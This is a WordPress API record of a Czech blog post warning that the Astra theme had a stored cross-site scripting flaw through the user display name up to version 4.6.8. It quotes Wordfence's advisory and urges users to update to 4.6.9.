{"id":8862,"date":"2024-03-26T07:56:48","date_gmt":"2024-03-26T07:56:48","guid":{"rendered":"https:\/\/musilda.cz\/?p=8862"},"modified":"2024-03-26T07:56:48","modified_gmt":"2024-03-26T07:56:48","slug":"wordpress-sablona-astra-obsahovala-bezpecnostni-hrozbu","status":"publish","type":"post","link":"https:\/\/affinite.io\/cs\/wordpress-sablona-astra-obsahovala-bezpecnostni-hrozbu\/","title":{"rendered":"WordPress \u0161ablona Astra obsahovala bezpe\u010dnostn\u00ed hrozbu"},"content":{"rendered":"\n
Astra <\/strong>pat\u0159\u00ed mezi popul\u00e1rn\u00ed WordPress \u0161ablony, kter\u00e1 m\u00e1 v\u00edce jak 1 milion aktivn\u00edch instalac\u00ed. Teprve v\u010dera byla zji\u0161t\u011bna XSS hrozba<\/strong>, kter\u00e1 se projevovala prost\u0159ednictv\u00edm zobrazovan\u00e9ho jm\u00e9na u\u017eivatele ve v\u0161ech verz\u00edch a\u017e do 4.6.8. Pokud jste tak ji\u017e neud\u011blali, neprodlen\u011b aktualizujte \u0161ablonu na nejnov\u011bj\u0161\u00ed verzi(4.6.9 a v\u00fd\u0161e)!<\/p>\n\n\n\n Pokud existuje zp\u016fsob, kter\u00fdm lze vkl\u00e1dat data, a z\u00e1rove\u0148 plugin nebo \u0161ablona dostate\u010dn\u011b nefiltruje to, co je na vstupu nebo v\u00fdstupu, tak lze \u00fato\u010dn\u00edkovi jednodu\u0161e nahr\u00e1t \u0161kodliv\u00fd obsah na na\u0161e webov\u00e9 str\u00e1nky.<\/p>\n\n\n\n Konkr\u00e9tn\u00ed vyj\u00e1d\u0159en\u00ed ke zmi\u0148ovan\u00e9mu probl\u00e9mu ze strany WordFence<\/a>:<\/p>\n\n\n\n Obecn\u011b se tedy doporu\u010duje, aby u\u017eivatel\u00e9 \u0161ablonu aktualizovali. Nejprve by v\u0161ak m\u011bli otestovat, zda aktualizovan\u00e1 \u0161ablona nezp\u016fsobuje \u017e\u00e1dn\u00e9 chyby, na kter\u00e9 si n\u011bkolik u\u017eivatel\u016f st\u011b\u017eovalo.<\/p>\n\n\n\n Astra pat\u0159\u00ed mezi popul\u00e1rn\u00ed WordPress \u0161ablony, kter\u00e1 m\u00e1 v\u00edce jak 1 milion aktivn\u00edch instalac\u00ed. Teprve v\u010dera byla zji\u0161t\u011bna XSS hrozba, kter\u00e1 se projevovala prost\u0159ednictv\u00edm zobrazovan\u00e9ho jm\u00e9na u\u017eivatele ve v\u0161ech verz\u00edch a\u017e do 4.6.8. Pokud jste tak ji\u017e neud\u011blali, neprodlen\u011b aktualizujte \u0161ablonu na nejnov\u011bj\u0161\u00ed verzi(4.6.9 a v\u00fd\u0161e)! XSS(Cross-Site Scripting Vulnerability) Pokud existuje zp\u016fsob, kter\u00fdm lze vkl\u00e1dat<\/p>\n","protected":false},"author":1,"featured_media":8866,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[81,551],"class_list":["post-8862","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-bezpecnost-wordpressu","tag-bezpecnost","tag-xss"],"_links":{"self":[{"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/posts\/8862"}],"collection":[{"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/comments?post=8862"}],"version-history":[{"count":0,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/posts\/8862\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/media\/8866"}],"wp:attachment":[{"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/media?parent=8862"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/categories?post=8862"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/tags?post=8862"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}XSS(Cross-Site Scripting Vulnerability)<\/h2>\n\n\n\n
The Astra theme for WordPress is vulnerable to Stored Cross-Site Scripting via a user's display name in all versions up to, and including, 4.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\n\r<\/pre>\n\n\n\n
<\/a><\/figure>\n","protected":false},"excerpt":{"rendered":"